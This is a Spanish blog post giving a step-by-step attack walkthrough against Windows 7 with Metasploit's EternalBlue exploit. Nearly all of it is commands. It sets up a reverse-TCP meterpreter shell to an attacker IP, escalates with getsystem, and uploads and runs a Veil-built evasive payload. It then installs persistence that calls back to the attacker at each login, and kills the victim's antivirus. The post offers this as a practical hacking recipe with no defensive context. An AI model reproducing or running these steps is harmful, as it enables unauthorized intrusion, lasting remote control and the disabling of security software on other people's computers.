viernes, 28 de julio de 2017

Intrusión a Windows 7 + bypass UAC + persistencia

Hola amigos, en el post de hoy vamos a hackear Windows 7 64 bits a través del exploit eternal blue, sin embargo, con él, se puede hackear también Windows 8 y Windows 10 (hasta Redstone 1) además, nos saltaremos el uac control y le añadiremos persistencia, para que podamos volver a tener acceso a él, aunque el dueño apague el ordenador.

En primer lugar, vamos a actualizar metasploit

apt-get install metasploit-framework

o bien

msfupdate

Iniciamos metasploit

msfconsole



use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.1.134

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.131

exploit



getuid



getsystem



Creamos un payload con veil (en otro puerto distinto, por ejemplo, el 4448), os aconsejo en ruby. Lo llamaré eternalblue.

Abrimos un nueva sesión de msfconsole con el handler que nos creó veil.

msfconsole -r /usr/share/veil-output/handlers/eternalblue.rc

En la primera sesión de metasploit, lo subimos (si no podéis subirlo al directorio en el que estéis, probad otro).

upload c:/usr/share/veil-output/compiled/eternalblue.exe

Y ejecutamos:

execute -f c:/directorio_payload_veil_subido/eternalblue.exe

Nos pasamos al metasploit de veil, nos habrá abierto una sesión de meterpreter

Configuramos la persistencia:

En primer lugar, copiamos eternalblue.exe a otro archivo distinto, eternalblue2 (no borres el primero, sólo copialo)

background

use post/windows/manage/persistence_exe

set REXENAME eternalblue2.exe

set REXEPATH /usr/share/veil-output/compiled/eternalblue2.exe

set STARTUP SYSTEM

Os cuento: en STARTUP debemos meter lo que nos ha salido cuando hicimos el getuid, bien USER,SYSTEM o SERVICE.

El módulo, subirá el payload eternalblue.exe de la máquina atacante a la vícitima y lo nombrará (en la víctima) como eternalblue2.exe.



Para más información sobre el módulo, info post/windows/manage/persistence_exe

Ejecutamos el módulo:

run

Si os sale un error, diciendo que stdapy está ejecutándose, cerrad la sesión que sacamos con el exploit eternalblue.

Otra opción para crear la persistencia, si usas un kali más antiguo, es persistence:

run persistence -U -i 10 -p 4444 -r 192.168.1.131

-U: Cuando el usuario comprometido abra su sesión, se ejecutará.
-p: Puerto del equipo atacante que estará a la escucha.
-r: ip del atacante.
-i: Tiempo en segundos que esperará para intentar una nueva conexión, en nuestro caso, si no ha sido capaz de crear la conexión con el atacante, esperará 10 segundos.

Más opciones haciendo run persistence -h

Ah, para matar el antivirus run killav o bien con el módulo post/windows/manage/killav

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.